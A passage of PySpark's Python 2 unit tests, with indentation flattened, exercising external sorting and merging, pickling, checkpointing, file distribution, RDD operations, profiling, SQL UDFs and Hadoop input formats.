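        # The three callables are assumed to be Aggregator's createCombiner, mergeValue
        # and mergeCombiners: start a list per key, append each new value to it, and
        # concatenate lists when partial results are merged.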
def test_in_memory(self):
m = InMemoryMerger(self.agg)
m.mergeValues(self.data)
self.assertEqual(sum(sum(v) for k, v in m.iteritems()),
sum(xrange(self.N)))
m = InMemoryMerger(self.agg)
m.mergeCombiners(map(lambda (x, y): (x, [y]), self.data))
self.assertEqual(sum(sum(v) for k, v in m.iteritems()),
sum(xrange(self.N)))
def test_small_dataset(self):
m = ExternalMerger(self.agg, 1000)
m.mergeValues(self.data)
self.assertEqual(m.spills, 0)
self.assertEqual(sum(sum(v) for k, v in m.iteritems()),
sum(xrange(self.N)))
m = ExternalMerger(self.agg, 1000)
m.mergeCombiners(map(lambda (x, y): (x, [y]), self.data))
self.assertEqual(m.spills, 0)
self.assertEqual(sum(sum(v) for k, v in m.iteritems()),
sum(xrange(self.N)))
def test_medium_dataset(self):
m = ExternalMerger(self.agg, 10)
m.mergeValues(self.data)
self.assertTrue(m.spills >= 1)
self.assertEqual(sum(sum(v) for k, v in m.iteritems()),
sum(xrange(self.N)))
m = ExternalMerger(self.agg, 10)
m.mergeCombiners(map(lambda (x, y): (x, [y]), self.data * 3))
self.assertTrue(m.spills >= 1)
self.assertEqual(sum(sum(v) for k, v in m.iteritems()),
sum(xrange(self.N)) * 3)
def test_huge_dataset(self):
m = ExternalMerger(self.agg, 10, partitions=3)
m.mergeCombiners(map(lambda (k, v): (k, [str(v)]), self.data * 10))
self.assertTrue(m.spills >= 1)
self.assertEqual(sum(len(v) for k, v in m._recursive_merged_items(0)),
self.N * 10)
m._cleanup()
class SorterTests(unittest.TestCase):
def test_in_memory_sort(self):
l = range(1024)
random.shuffle(l)
sorter = ExternalSorter(1024)
self.assertEquals(sorted(l), list(sorter.sorted(l)))
self.assertEquals(sorted(l, reverse=True), list(sorter.sorted(l, reverse=True)))
self.assertEquals(sorted(l, key=lambda x: -x), list(sorter.sorted(l, key=lambda x: -x)))
self.assertEquals(sorted(l, key=lambda x: -x, reverse=True),
list(sorter.sorted(l, key=lambda x: -x, reverse=True)))
def test_external_sort(self):
l = range(1024)
random.shuffle(l)
sorter = ExternalSorter(1)
self.assertEquals(sorted(l), list(sorter.sorted(l)))
self.assertGreater(shuffle.DiskBytesSpilled, 0)
last = shuffle.DiskBytesSpilled
self.assertEquals(sorted(l, reverse=True), list(sorter.sorted(l, reverse=True)))
self.assertGreater(shuffle.DiskBytesSpilled, last)
last = shuffle.DiskBytesSpilled
self.assertEquals(sorted(l, key=lambda x: -x), list(sorter.sorted(l, key=lambda x: -x)))
self.assertGreater(shuffle.DiskBytesSpilled, last)
last = shuffle.DiskBytesSpilled
self.assertEquals(sorted(l, key=lambda x: -x, reverse=True),
list(sorter.sorted(l, key=lambda x: -x, reverse=True)))
self.assertGreater(shuffle.DiskBytesSpilled, last)
def test_external_sort_in_rdd(self):
conf = SparkConf().set("spark.python.worker.memory", "1m")
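        # The tiny 1m worker memory limit is assumed to force the sort to spill to disk,
        # exercising the external-sort code path inside sortBy.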
sc = SparkContext(conf=conf)
l = range(10240)
random.shuffle(l)
rdd = sc.parallelize(l, 10)
self.assertEquals(sorted(l), rdd.sortBy(lambda x: x).collect())
sc.stop()
class SerializationTestCase(unittest.TestCase):
def test_namedtuple(self):
from collections import namedtuple
from cPickle import dumps, loads
P = namedtuple("P", "x y")
p1 = P(1, 3)
p2 = loads(dumps(p1, 2))
self.assertEquals(p1, p2)
def test_itemgetter(self):
from operator import itemgetter
ser = CloudPickleSerializer()
d = range(10)
getter = itemgetter(1)
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
getter = itemgetter(0, 3)
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
def test_attrgetter(self):
from operator import attrgetter
ser = CloudPickleSerializer()
class C(object):
def __getattr__(self, item):
return item
d = C()
getter = attrgetter("a")
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
getter = attrgetter("a", "b")
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
d.e = C()
getter = attrgetter("e.a")
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
getter = attrgetter("e.a", "e.b")
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
# Regression test for SPARK-3415
def test_pickling_file_handles(self):
ser = CloudPickleSerializer()
out1 = sys.stderr
out2 = ser.loads(ser.dumps(out1))
self.assertEquals(out1, out2)
def test_func_globals(self):
class Unpicklable(object):
def __reduce__(self):
raise Exception("not picklable")
global exit
exit = Unpicklable()
ser = CloudPickleSerializer()
self.assertRaises(Exception, lambda: ser.dumps(exit))
def foo():
sys.exit(0)
self.assertTrue("exit" in foo.func_code.co_names)
ser.dumps(foo)
class PySparkTestCase(unittest.TestCase):
def setUp(self):
self._old_sys_path = list(sys.path)
class_name = self.__class__.__name__
self.sc = SparkContext('local[4]', class_name, batchSize=2)
def tearDown(self):
self.sc.stop()
sys.path = self._old_sys_path
class ReusedPySparkTestCase(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.sc = SparkContext('local[4]', cls.__name__, batchSize=2)
@classmethod
def tearDownClass(cls):
cls.sc.stop()
class CheckpointTests(ReusedPySparkTestCase):
def setUp(self):
self.checkpointDir = tempfile.NamedTemporaryFile(delete=False)
os.unlink(self.checkpointDir.name)
self.sc.setCheckpointDir(self.checkpointDir.name)
def tearDown(self):
shutil.rmtree(self.checkpointDir.name)
def test_basic_checkpointing(self):
parCollection = self.sc.parallelize([1, 2, 3, 4])
flatMappedRDD = parCollection.flatMap(lambda x: range(1, x + 1))
self.assertFalse(flatMappedRDD.isCheckpointed())
self.assertTrue(flatMappedRDD.getCheckpointFile() is None)
flatMappedRDD.checkpoint()
result = flatMappedRDD.collect()
time.sleep(1) # 1 second
self.assertTrue(flatMappedRDD.isCheckpointed())
self.assertEqual(flatMappedRDD.collect(), result)
self.assertEqual("file:" + self.checkpointDir.name,
os.path.dirname(os.path.dirname(flatMappedRDD.getCheckpointFile())))
def test_checkpoint_and_restore(self):
parCollection = self.sc.parallelize([1, 2, 3, 4])
flatMappedRDD = parCollection.flatMap(lambda x: [x])
self.assertFalse(flatMappedRDD.isCheckpointed())
self.assertTrue(flatMappedRDD.getCheckpointFile() is None)
flatMappedRDD.checkpoint()
flatMappedRDD.count() # forces a checkpoint to be computed
time.sleep(1) # 1 second
self.assertTrue(flatMappedRDD.getCheckpointFile() is not None)
recovered = self.sc._checkpointFile(flatMappedRDD.getCheckpointFile(),
flatMappedRDD._jrdd_deserializer)
self.assertEquals([1, 2, 3, 4], recovered.collect())
class AddFileTests(PySparkTestCase):
def test_add_py_file(self):
# To ensure that we're actually testing addPyFile's effects, check that
# this job fails due to `userlibrary` not being on the Python path:
# disable logging in log4j temporarily
log4j = self.sc._jvm.org.apache.log4j
old_level = log4j.LogManager.getRootLogger().getLevel()
log4j.LogManager.getRootLogger().setLevel(log4j.Level.FATAL)
def func(x):
from userlibrary import UserClass
return UserClass().hello()
self.assertRaises(Exception,
self.sc.parallelize(range(2)).map(func).first)
log4j.LogManager.getRootLogger().setLevel(old_level)
# Add the file, so the job should now succeed:
path = os.path.join(SPARK_HOME, "python/test_support/userlibrary.py")
self.sc.addPyFile(path)
res = self.sc.parallelize(range(2)).map(func).first()
self.assertEqual("Hello World!", res)
def test_add_file_locally(self):
path = os.path.join(SPARK_HOME, "python/test_support/hello.txt")
self.sc.addFile(path)
download_path = SparkFiles.get("hello.txt")
self.assertNotEqual(path, download_path)
with open(download_path) as test_file:
self.assertEquals("Hello World!\n", test_file.readline())
def test_add_py_file_locally(self):
# To ensure that we're actually testing addPyFile's effects, check that
# this fails due to `userlibrary` not being on the Python path:
def func():
from userlibrary import UserClass
self.assertRaises(ImportError, func)
path = os.path.join(SPARK_HOME, "python/test_support/userlibrary.py")
self.sc.addFile(path)
from userlibrary import UserClass
self.assertEqual("Hello World!", UserClass().hello())
def test_add_egg_file_locally(self):
# To ensure that we're actually testing addPyFile's effects, check that
# this fails due to `userlibrary` not being on the Python path:
def func():
from userlib import UserClass
self.assertRaises(ImportError, func)
path = os.path.join(SPARK_HOME, "python/test_support/userlib-0.1-py2.7.egg")
self.sc.addPyFile(path)
from userlib import UserClass
self.assertEqual("Hello World from inside a package!", UserClass().hello())
def test_overwrite_system_module(self):
self.sc.addPyFile(os.path.join(SPARK_HOME, "python/test_support/SimpleHTTPServer.py"))
import SimpleHTTPServer
self.assertEqual("My Server", SimpleHTTPServer.__name__)
def func(x):
import SimpleHTTPServer
return SimpleHTTPServer.__name__
self.assertEqual(["My Server"], self.sc.parallelize(range(1)).map(func).collect())
class RDDTests(ReusedPySparkTestCase):
def test_id(self):
rdd = self.sc.parallelize(range(10))
id = rdd.id()
self.assertEqual(id, rdd.id())
rdd2 = rdd.map(str).filter(bool)
id2 = rdd2.id()
self.assertEqual(id + 1, id2)
self.assertEqual(id2, rdd2.id())
def test_save_as_textfile_with_unicode(self):
# Regression test for SPARK-970
x = u"\u00A1Hola, mundo!"
data = self.sc.parallelize([x])
tempFile = tempfile.NamedTemporaryFile(delete=True)
tempFile.close()
data.saveAsTextFile(tempFile.name)
raw_contents = ''.join(input(glob(tempFile.name + "/part-0000*")))
self.assertEqual(x, unicode(raw_contents.strip(), "utf-8"))
def test_save_as_textfile_with_utf8(self):
x = u"\u00A1Hola, mundo!"
data = self.sc.parallelize([x.encode("utf-8")])
tempFile = tempfile.NamedTemporaryFile(delete=True)
tempFile.close()
data.saveAsTextFile(tempFile.name)
raw_contents = ''.join(input(glob(tempFile.name + "/part-0000*")))
self.assertEqual(x, unicode(raw_contents.strip(), "utf-8"))
def test_transforming_cartesian_result(self):
# Regression test for SPARK-1034
rdd1 = self.sc.parallelize([1, 2])
rdd2 = self.sc.parallelize([3, 4])
cart = rdd1.cartesian(rdd2)
result = cart.map(lambda (x, y): x + y).collect()
def test_transforming_pickle_file(self):
# Regression test for SPARK-2601
data = self.sc.parallelize(["Hello", "World!"])
tempFile = tempfile.NamedTemporaryFile(delete=True)
tempFile.close()
data.saveAsPickleFile(tempFile.name)
pickled_file = self.sc.pickleFile(tempFile.name)
pickled_file.map(lambda x: x).collect()
def test_cartesian_on_textfile(self):
# Regression test for
path = os.path.join(SPARK_HOME, "python/test_support/hello.txt")
a = self.sc.textFile(path)
result = a.cartesian(a).collect()
(x, y) = result[0]
self.assertEqual("Hello World!", x.strip())
self.assertEqual("Hello World!", y.strip())
def test_deleting_input_files(self):
# Regression test for SPARK-1025
tempFile = tempfile.NamedTemporaryFile(delete=False)
tempFile.write("Hello World!")
tempFile.close()
data = self.sc.textFile(tempFile.name)
filtered_data = data.filter(lambda x: True)
self.assertEqual(1, filtered_data.count())
os.unlink(tempFile.name)
self.assertRaises(Exception, lambda: filtered_data.count())
def test_sampling_default_seed(self):
# Test for SPARK-3995 (default seed setting)
data = self.sc.parallelize(range(1000), 1)
subset = data.takeSample(False, 10)
self.assertEqual(len(subset), 10)
def testAggregateByKey(self):
data = self.sc.parallelize([(1, 1), (1, 1), (3, 2), (5, 1), (5, 3)], 2)
def seqOp(x, y):
x.add(y)
return x
def combOp(x, y):
x |= y
return x
sets = dict(data.aggregateByKey(set(), seqOp, combOp).collect())
self.assertEqual(3, len(sets))
self.assertEqual(set([1]), sets[1])
self.assertEqual(set([2]), sets[3])
self.assertEqual(set([1, 3]), sets[5])
def test_itemgetter(self):
rdd = self.sc.parallelize([range(10)])
from operator import itemgetter
self.assertEqual([1], rdd.map(itemgetter(1)).collect())
self.assertEqual([(2, 3)], rdd.map(itemgetter(2, 3)).collect())
def test_namedtuple_in_rdd(self):
from collections import namedtuple
Person = namedtuple("Person", "id firstName lastName")
jon = Person(1, "Jon", "Doe")
jane = Person(2, "Jane", "Doe")
theDoes = self.sc.parallelize([jon, jane])
self.assertEquals([jon, jane], theDoes.collect())
def test_large_broadcast(self):
N = 100000
data = [[float(i) for i in range(300)] for i in range(N)]
bdata = self.sc.broadcast(data) # 270MB
m = self.sc.parallelize(range(1), 1).map(lambda x: len(bdata.value)).sum()
self.assertEquals(N, m)
def test_large_closure(self):
N = 1000000
data = [float(i) for i in xrange(N)]
rdd = self.sc.parallelize(range(1), 1).map(lambda x: len(data))
self.assertEquals(N, rdd.first())
self.assertTrue(rdd._broadcast is not None)
rdd = self.sc.parallelize(range(1), 1).map(lambda x: 1)
self.assertEqual(1, rdd.first())
self.assertTrue(rdd._broadcast is None)
def test_zip_with_different_serializers(self):
a = self.sc.parallelize(range(5))
b = self.sc.parallelize(range(100, 105))
self.assertEqual(a.zip(b).collect(), [(0, 100), (1, 101), (2, 102), (3, 103), (4, 104)])
a = a._reserialize(BatchedSerializer(PickleSerializer(), 2))
b = b._reserialize(MarshalSerializer())
self.assertEqual(a.zip(b).collect(), [(0, 100), (1, 101), (2, 102), (3, 103), (4, 104)])
def test_zip_with_different_number_of_items(self):
a = self.sc.parallelize(range(5), 2)
# different number of partitions
b = self.sc.parallelize(range(100, 106), 3)
self.assertRaises(ValueError, lambda: a.zip(b))
# different number of batched items in JVM
b = self.sc.parallelize(range(100, 104), 2)
self.assertRaises(Exception, lambda: a.zip(b).count())
# different number of items in one pair
b = self.sc.parallelize(range(100, 106), 2)
self.assertRaises(Exception, lambda: a.zip(b).count())
# same total number of items, but different distributions
a = self.sc.parallelize([2, 3], 2).flatMap(range)
b = self.sc.parallelize([3, 2], 2).flatMap(range)
self.assertEquals(a.count(), b.count())
self.assertRaises(Exception, lambda: a.zip(b).count())
def test_count_approx_distinct(self):
rdd = self.sc.parallelize(range(1000))
self.assertTrue(950 < rdd.countApproxDistinct(0.04) < 1050)
self.assertTrue(950 < rdd.map(float).countApproxDistinct(0.04) < 1050)
self.assertTrue(950 < rdd.map(str).countApproxDistinct(0.04) < 1050)
self.assertTrue(950 < rdd.map(lambda x: (x, -x)).countApproxDistinct(0.04) < 1050)
rdd = self.sc.parallelize([i % 20 for i in range(1000)], 7)
self.assertTrue(18 < rdd.countApproxDistinct() < 22)
self.assertTrue(18 < rdd.map(float).countApproxDistinct() < 22)
self.assertTrue(18 < rdd.map(str).countApproxDistinct() < 22)
self.assertTrue(18 < rdd.map(lambda x: (x, -x)).countApproxDistinct() < 22)
self.assertRaises(ValueError, lambda: rdd.countApproxDistinct(0.00000001))
self.assertRaises(ValueError, lambda: rdd.countApproxDistinct(0.5))
def test_histogram(self):
# empty
rdd = self.sc.parallelize([])
self.assertEquals([0], rdd.histogram([0, 10])[1])
self.assertEquals([0, 0], rdd.histogram([0, 4, 10])[1])
self.assertRaises(ValueError, lambda: rdd.histogram(1))
# out of range
rdd = self.sc.parallelize([10.01, -0.01])
self.assertEquals([0], rdd.histogram([0, 10])[1])
self.assertEquals([0, 0], rdd.histogram((0, 4, 10))[1])
# in range with one bucket
rdd = self.sc.parallelize(range(1, 5))
self.assertEquals([4], rdd.histogram([0, 10])[1])
self.assertEquals([3, 1], rdd.histogram([0, 4, 10])[1])
# in range with one bucket exact match
self.assertEquals([4], rdd.histogram([1, 4])[1])
# out of range with two buckets
rdd = self.sc.parallelize([10.01, -0.01])
self.assertEquals([0, 0], rdd.histogram([0, 5, 10])[1])
# out of range with two uneven buckets
rdd = self.sc.parallelize([10.01, -0.01])
self.assertEquals([0, 0], rdd.histogram([0, 4, 10])[1])
# in range with two buckets
rdd = self.sc.parallelize([1, 2, 3, 5, 6])
self.assertEquals([3, 2], rdd.histogram([0, 5, 10])[1])
# in range with two bucket and None
rdd = self.sc.parallelize([1, 2, 3, 5, 6, None, float('nan')])
self.assertEquals([3, 2], rdd.histogram([0, 5, 10])[1])
# in range with two uneven buckets
rdd = self.sc.parallelize([1, 2, 3, 5, 6])
self.assertEquals([3, 2], rdd.histogram([0, 5, 11])[1])
# mixed range with two uneven buckets
rdd = self.sc.parallelize([-0.01, 0.0, 1, 2, 3, 5, 6, 11.0, 11.01])
self.assertEquals([4, 3], rdd.histogram([0, 5, 11])[1])
# mixed range with four uneven buckets
rdd = self.sc.parallelize([-0.01, 0.0, 1, 2, 3, 5, 6, 11.01, 12.0, 199.0, 200.0, 200.1])
self.assertEquals([4, 2, 1, 3], rdd.histogram([0.0, 5.0, 11.0, 12.0, 200.0])[1])
# mixed range with uneven buckets and NaN
rdd = self.sc.parallelize([-0.01, 0.0, 1, 2, 3, 5, 6, 11.01, 12.0,
199.0, 200.0, 200.1, None, float('nan')])
self.assertEquals([4, 2, 1, 3], rdd.histogram([0.0, 5.0, 11.0, 12.0, 200.0])[1])
# out of range with infinite buckets
rdd = self.sc.parallelize([10.01, -0.01, float('nan'), float("inf")])
self.assertEquals([1, 2], rdd.histogram([float('-inf'), 0, float('inf')])[1])
# invalid buckets
self.assertRaises(ValueError, lambda: rdd.histogram([]))
self.assertRaises(ValueError, lambda: rdd.histogram([1]))
self.assertRaises(ValueError, lambda: rdd.histogram(0))
self.assertRaises(TypeError, lambda: rdd.histogram({}))
# without buckets
rdd = self.sc.parallelize(range(1, 5))
self.assertEquals(([1, 4], [4]), rdd.histogram(1))
# without buckets single element
rdd = self.sc.parallelize([1])
self.assertEquals(([1, 1], [1]), rdd.histogram(1))
# without bucket no range
rdd = self.sc.parallelize([1] * 4)
self.assertEquals(([1, 1], [4]), rdd.histogram(1))
# without buckets basic two
rdd = self.sc.parallelize(range(1, 5))
self.assertEquals(([1, 2.5, 4], [2, 2]), rdd.histogram(2))
# without buckets with more requested than elements
rdd = self.sc.parallelize([1, 2])
buckets = [1 + 0.2 * i for i in range(6)]
hist = [1, 0, 0, 0, 1]
self.assertEquals((buckets, hist), rdd.histogram(5))
# invalid RDDs
rdd = self.sc.parallelize([1, float('inf')])
self.assertRaises(ValueError, lambda: rdd.histogram(2))
rdd = self.sc.parallelize([float('nan')])
self.assertRaises(ValueError, lambda: rdd.histogram(2))
# string
rdd = self.sc.parallelize(["ab", "ac", "b", "bd", "ef"], 2)
self.assertEquals([2, 2], rdd.histogram(["a", "b", "c"])[1])
self.assertEquals((["ab", "ef"], [5]), rdd.histogram(1))
self.assertRaises(TypeError, lambda: rdd.histogram(2))
# mixed RDD
rdd = self.sc.parallelize([1, 4, "ab", "ac", "b"], 2)
self.assertEquals([1, 1], rdd.histogram([0, 4, 10])[1])
self.assertEquals([2, 1], rdd.histogram(["a", "b", "c"])[1])
self.assertEquals(([1, "b"], [5]), rdd.histogram(1))
self.assertRaises(TypeError, lambda: rdd.histogram(2))
def test_repartitionAndSortWithinPartitions(self):
rdd = self.sc.parallelize([(0, 5), (3, 8), (2, 6), (0, 8), (3, 8), (1, 3)], 2)
repartitioned = rdd.repartitionAndSortWithinPartitions(2, lambda key: key % 2)
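        # With the key % 2 partition function, even keys should land in partition 0 and
        # odd keys in partition 1, each sorted by key (verified below).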
partitions = repartitioned.glom().collect()
self.assertEquals(partitions[0], [(0, 5), (0, 8), (2, 6)])
self.assertEquals(partitions[1], [(1, 3), (3, 8), (3, 8)])
def test_distinct(self):
rdd = self.sc.parallelize((1, 2, 3)*10, 10)
self.assertEquals(rdd.getNumPartitions(), 10)
self.assertEquals(rdd.distinct().count(), 3)
result = rdd.distinct(5)
self.assertEquals(result.getNumPartitions(), 5)
self.assertEquals(result.count(), 3)
class ProfilerTests(PySparkTestCase):
def setUp(self):
self._old_sys_path = list(sys.path)
class_name = self.__class__.__name__
conf = SparkConf().set("spark.python.profile", "true")
self.sc = SparkContext('local[4]', class_name, batchSize=2, conf=conf)
def test_profiler(self):
def heavy_foo(x):
for i in range(1 << 20):
x = 1
rdd = self.sc.parallelize(range(100))
rdd.foreach(heavy_foo)
profiles = self.sc._profile_stats
self.assertEqual(1, len(profiles))
id, acc, _ = profiles[0]
stats = acc.value
self.assertTrue(stats is not None)
width, stat_list = stats.get_print_list([])
func_names = [func_name for fname, n, func_name in stat_list]
self.assertTrue("heavy_foo" in func_names)
self.sc.show_profiles()
d = tempfile.gettempdir()
self.sc.dump_profiles(d)
self.assertTrue("rdd_%d.pstats" % id in os.listdir(d))
class SQLTests(ReusedPySparkTestCase):
def setUp(self):
self.sqlCtx = SQLContext(self.sc)
def test_udf(self):
self.sqlCtx.registerFunction("twoArgs", lambda x, y: len(x) + y, IntegerType())
[row] = self.sqlCtx.sql("SELECT twoArgs('test', 1)").collect()
self.assertEqual(row[0], 5)
def test_udf2(self):
self.sqlCtx.registerFunction("strlen", lambda string: len(string))
self.sqlCtx.inferSchema(self.sc.parallelize([Row(a="test")])).registerTempTable("test")
[res] = self.sqlCtx.sql("SELECT strlen(a) FROM test WHERE strlen(a) > 1").collect()
self.assertEqual(u"4", res[0])
def test_broadcast_in_udf(self):
bar = {"a": "aa", "b": "bb", "c": "abc"}
foo = self.sc.broadcast(bar)
self.sqlCtx.registerFunction("MYUDF", lambda x: foo.value[x] if x else '')
[res] = self.sqlCtx.sql("SELECT MYUDF('c')").collect()
self.assertEqual("abc", res[0])
[res] = self.sqlCtx.sql("SELECT MYUDF('')").collect()
self.assertEqual("", res[0])
def test_basic_functions(self):
rdd = self.sc.parallelize(['{"foo":"bar"}', '{"foo":"baz"}'])
srdd = self.sqlCtx.jsonRDD(rdd)
srdd.count()
srdd.collect()
srdd.schemaString()
srdd.schema()
# cache and checkpoint
self.assertFalse(srdd.is_cached)
srdd.persist()
srdd.unpersist()
srdd.cache()
self.assertTrue(srdd.is_cached)
self.assertFalse(srdd.isCheckpointed())
self.assertEqual(None, srdd.getCheckpointFile())
srdd = srdd.coalesce(2, True)
srdd = srdd.repartition(3)
srdd = srdd.distinct()
srdd.intersection(srdd)
self.assertEqual(2, srdd.count())
srdd.registerTempTable("temp")
srdd = self.sqlCtx.sql("select foo from temp")
srdd.count()
srdd.collect()
def test_distinct(self):
rdd = self.sc.parallelize(['{"a": 1}', '{"b": 2}', '{"c": 3}']*10, 10)
srdd = self.sqlCtx.jsonRDD(rdd)
self.assertEquals(srdd.getNumPartitions(), 10)
self.assertEquals(srdd.distinct().count(), 3)
result = srdd.distinct(5)
self.assertEquals(result.getNumPartitions(), 5)
self.assertEquals(result.count(), 3)
def test_apply_schema_to_row(self):
srdd = self.sqlCtx.jsonRDD(self.sc.parallelize(["""{"a":2}"""]))
srdd2 = self.sqlCtx.applySchema(srdd.map(lambda x: x), srdd.schema())
self.assertEqual(srdd.collect(), srdd2.collect())
rdd = self.sc.parallelize(range(10)).map(lambda x: Row(a=x))
srdd3 = self.sqlCtx.applySchema(rdd, srdd.schema())
self.assertEqual(10, srdd3.count())
def test_serialize_nested_array_and_map(self):
d = [Row(l=[Row(a=1, b='s')], d={"key": Row(c=1.0, d="2")})]
rdd = self.sc.parallelize(d)
srdd = self.sqlCtx.inferSchema(rdd)
row = srdd.first()
self.assertEqual(1, len(row.l))
self.assertEqual(1, row.l[0].a)
self.assertEqual("2", row.d["key"].d)
l = srdd.map(lambda x: x.l).first()
self.assertEqual(1, len(l))
self.assertEqual('s', l[0].b)
d = srdd.map(lambda x: x.d).first()
self.assertEqual(1, len(d))
self.assertEqual(1.0, d["key"].c)
row = srdd.map(lambda x: x.d["key"]).first()
self.assertEqual(1.0, row.c)
self.assertEqual("2", row.d)
def test_convert_row_to_dict(self):
row = Row(l=[Row(a=1, b='s')], d={"key": Row(c=1.0, d="2")})
self.assertEqual(1, row.asDict()['l'][0].a)
rdd = self.sc.parallelize([row])
srdd = self.sqlCtx.inferSchema(rdd)
srdd.registerTempTable("test")
row = self.sqlCtx.sql("select l[0].a AS la from test").first()
self.assertEqual(1, row.asDict()["la"])
class InputFormatTests(ReusedPySparkTestCase):
@classmethod
def setUpClass(cls):
ReusedPySparkTestCase.setUpClass()
cls.tempdir = tempfile.NamedTemporaryFile(delete=False)
os.unlink(cls.tempdir.name)
cls.sc._jvm.WriteInputFormatTestDataGenerator.generateData(cls.tempdir.name, cls.sc._jsc)
@classmethod
def tearDownClass(cls):
ReusedPySparkTestCase.tearDownClass()
shutil.rmtree(cls.tempdir.name)
def test_sequencefiles(self):
basepath = self.tempdir.name
ints = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfint/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text").collect())
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.assertEqual(ints, ei)
doubles = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfdouble/",
"org.apache.hadoop.io.DoubleWritable",
"org.apache.hadoop.io.Text").collect())
ed = [(1.0, u'aa'), (1.0, u'aa'), (2.0, u'aa'), (2.0, u'bb'), (2.0, u'bb'), (3.0, u'cc')]
self.assertEqual(doubles, ed)
bytes = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfbytes/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.BytesWritable").collect())
ebs = [(1, bytearray('aa', 'utf-8')),
(1, bytearray('aa', 'utf-8')),
(2, bytearray('aa', 'utf-8')),
(2, bytearray('bb', 'utf-8')),
(2, bytearray('bb', 'utf-8')),
(3, bytearray('cc', 'utf-8'))]
self.assertEqual(bytes, ebs)
text = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sftext/",
"org.apache.hadoop.io.Text",
"org.apache.hadoop.io.Text").collect())
et = [(u'1', u'aa'),
(u'1', u'aa'),
(u'2', u'aa'),
(u'2', u'bb'),
(u'2', u'bb'),
(u'3', u'cc')]
self.assertEqual(text, et)
bools = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfbool/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.BooleanWritable").collect())
eb = [(1, False), (1, True), (2, False), (2, False), (2, True), (3, True)]
self.assertEqual(bools, eb)
nulls = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfnull/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.BooleanWritable").collect())
en = [(1, None), (1, None), (2, None), (2, None), (2, None), (3, None)]
self.assertEqual(nulls, en)
maps = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfmap/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable").collect())
em = [(1, {}),
(1, {3.0: u'bb'}),
(2, {1.0: u'aa'}),
(2, {1.0: u'cc'}),
(3, {2.0: u'dd'})]
self.assertEqual(maps, em)
# arrays get pickled to tuples by default
tuples = sorted(self.sc.sequenceFile(
basepath + "/sftestdata/sfarray/",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable").collect())
et = [(1, ()),
(2, (3.0, 4.0, 5.0)),
(3, (4.0, 5.0, 6.0))]
self.assertEqual(tuples, et)
# with custom converters, primitive arrays can stay as arrays
arrays = sorted(self.sc.sequenceFile(
basepath + "/sftestdata/sfarray/",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable",
valueConverter="org.apache.spark.api.python.WritableToDoubleArrayConverter").collect())
ea = [(1, array('d')),
(2, array('d', [3.0, 4.0, 5.0])),
(3, array('d', [4.0, 5.0, 6.0]))]
self.assertEqual(arrays, ea)
clazz = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfclass/",
"org.apache.hadoop.io.Text",
"org.apache.spark.api.python.TestWritable").collect())
ec = (u'1',
{u'__class__': u'org.apache.spark.api.python.TestWritable',
u'double': 54.0, u'int': 123, u'str': u'test1'})
self.assertEqual(clazz[0], ec)
unbatched_clazz = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfclass/",
"org.apache.hadoop.io.Text",
"org.apache.spark.api.python.TestWritable",
batchSize=1).collect())
self.assertEqual(unbatched_clazz[0], ec)
def test_oldhadoop(self):
basepath = self.tempdir.name
ints = sorted(self.sc.hadoopFile(basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text").collect())
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.assertEqual(ints, ei)
hellopath = os.path.join(SPARK_HOME, "python/test_support/hello.txt")
oldconf = {"mapred.input.dir": hellopath}
hello = self.sc.hadoopRDD("org.apache.hadoop.mapred.TextInputFormat",
"org.apache.hadoop.io.LongWritable",
"org.apache.hadoop.io.Text",
conf=oldconf).collect()
result = [(0, u'Hello World!')]
self.assertEqual(hello, result)
def test_newhadoop(self):
basepath = self.tempdir.name
ints = sorted(self.sc.newAPIHadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text").collect())
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.assertEqual(ints, ei)
hellopath = os.path.join(SPARK_HOME, "python/test_support/hello.txt")
newconf = {"mapred.input.dir": hellopath}
hello = self.sc.newAPIHadoopRDD("org.apache.hadoop.mapreduce.lib.input.TextInputFormat",
"org.apache.hadoop.io.LongWritable",
"org.apache.hadoop.io.Text",
conf=newconf).collect()
result = [(0, u'Hello World!')]
self.assertEqual(hello, result)
def test_newolderror(self):
basepath = self.tempdir.name
self.assertRaises(Exception, lambda: self.sc.hadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text"))
self.assertRaises(Exception, lambda: self.sc.newAPIHadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text"))
